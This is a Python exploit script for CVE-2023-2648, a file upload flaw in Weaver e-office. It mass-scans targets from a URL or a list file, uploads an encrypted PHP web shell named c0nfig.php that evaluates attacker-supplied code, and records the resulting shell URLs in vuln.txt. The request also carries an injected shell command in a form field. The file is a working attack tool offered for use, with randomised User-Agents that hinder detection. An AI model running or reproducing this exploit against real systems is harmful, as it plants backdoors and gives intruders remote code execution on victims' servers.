#! /usr/bin/env python
# -*- encoding: utf-8 -*-
import requests
import sys
from time import time
import random
import urllib3
import base64
from urllib import parse
from argparse import ArgumentParser
import threadpool


#python3
# poc() sends its request with verify=False; this call only hides the
# resulting InsecureRequestWarning, it does not make the connection verified.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# NOTE(review): read at import time, so running with no command-line argument
# raises IndexError here. The __main__ block rebinds this name from argparse.
filename = sys.argv[1]

# Targets read from the -f file are accumulated here by the __main__ block.
url_list = []

# Passed to requests.post() in poc(): traffic for both schemes is directed at
# a proxy on 127.0.0.1:8080 rather than sent straight to the target.
proxies = {
	'http': 'http://127.0.0.1:8080',
	'https': 'https://127.0.0.1:8080',
}

# Random User-Agent
def get_ua():
	"""Return a randomised desktop-Chrome User-Agent string.

	The Chrome major version is drawn from 55-62 and the platform token from
	three fixed choices, so the header differs between calls. For detection
	this means the User-Agent value alone is not a stable indicator of
	requests made by this script.
	"""
	# The three version draws happen before the platform draw, in this order.
	major = random.randint(55, 62)
	build = random.randint(0, 3200)
	patch = random.randint(0, 140)
	platforms = (
		'(Windows NT 6.1; WOW64)',
		'(Windows NT 10.0; WOW64)',
		'(Macintosh; Intel Mac OS X 10_12_6)',
	)
	chrome_token = 'Chrome/{}.0.{}.{}'.format(major, build, patch)
	pieces = (
		'Mozilla/5.0',
		random.choice(platforms),
		'AppleWebKit/537.36',
		'(KHTML, like Gecko)',
		chrome_token,
		'Safari/537.36',
	)
	return ' '.join(pieces)


def wirte_targets(vurl, filename):
	"""Append ``vurl`` followed by a newline to the file ``filename``.

	The file is opened in append mode, so it is created when missing and
	earlier entries are kept.
	"""
	with open(filename, mode="a+") as out:
		out.write(vurl + "\n")

# getshell function
def poc(url):
	url=parse.urlparse(url)
	url='{}://{}'.format(url[0],url[1])
	vulnurl=url + "/inc/jquery/uploadify/uploadify.php"
	headers = {
		'User-Agent': get_ua(),
		"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary1ZCUAAAXxnYuVIZR"
	}
	data='''
------WebKitFormBoundary1ZCUAAAXxnYuVIZR
Content-Disposition: form-data; name="name"

1&&calc&&copy nul a.doc
------WebKitFormBoundary1ZCUAAAXxnYuVIZR
Content-Disposition: form-data; name="Filedata"; filename="c0nfig.php"
Content-Type: application/msword

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
		eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}
------WebKitFormBoundary1ZCUAAAXxnYuVIZR--
	
	'''
	try:
		res = requests.post(vulnurl, verify=False, allow_redirects=False, data=data,headers=headers,timeout=10,proxies=proxies)#
		if res.status_code == 200 and int(res.text) >= 1:
			shellurl=url + "/attachment/{}/c0nfig.php".format(res.text)
			print("\033[32m[+]{} is vulnerable\n{}\033[0m".format(vulnurl,shellurl))
			wirte_targets(shellurl,"vuln.txt")
		else:
			print("\033[34m[-]{} not vulnerable.\033[0m".format(url))
	except Exception as e:
		print("\033[34m[!]{} request false.\033[0m".format(url))
		pass


# Multithreading
def multithreading(url_list, pools=5):
	"""Run ``poc`` once per entry of ``url_list`` on a thread pool.

	Args:
		url_list: Iterable of target URLs; it is copied before dispatch.
		pools: Number of worker threads handed to ``threadpool.ThreadPool``.

	Blocks until every queued request has finished. Because ``poc`` appends
	to ``vuln.txt`` from each worker, the order of lines in that file follows
	completion order, not input order.
	"""
	targets = list(url_list)
	workers = threadpool.ThreadPool(pools)
	for job in threadpool.makeRequests(poc, targets):
		workers.putRequest(job)
	workers.wait()


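if __name__ == "__main__":
	# Banner printed on every run; it names the CVE this script targets.
	show = r'''

	cve-2023-2648
	                                                                    
                         泛微cve-2023-2648任意文件上传 By when
	'''
	print(show + '\n')
	arg = ArgumentParser(description='check_vulnerabilities By when')
	# NOTE(review): both help examples name CVE-2023-32315.py while the banner
	# says cve-2023-2648; the strings are left as the author wrote them.
	arg.add_argument(
		"-u",
		"--url",
		help="Target URL; Example:python3 CVE-2023-32315.py -u http://ip:port",
	)
	arg.add_argument(
		"-f",
		"--file",
		help="Target URL; Example:python3 CVE-2023-32315.py -f url.txt",
	)
	args = arg.parse_args()
	url = args.url
	filename = args.file
	start = time()
	# Exactly one of -u / -f selects a mode; with both or neither given,
	# nothing is sent and only the elapsed time is printed.
	if url is not None and filename is None:
		poc(url)
	elif url is None and filename is not None:
		# Context manager so the target list file is closed after reading
		# (the handle was previously left open).
		with open(filename) as targets:
			for i in targets:
				url_list.append(i.replace('\n', ''))
		multithreading(url_list, 10)
	end = time()
	print('任务完成，用时%ds' % (end - start))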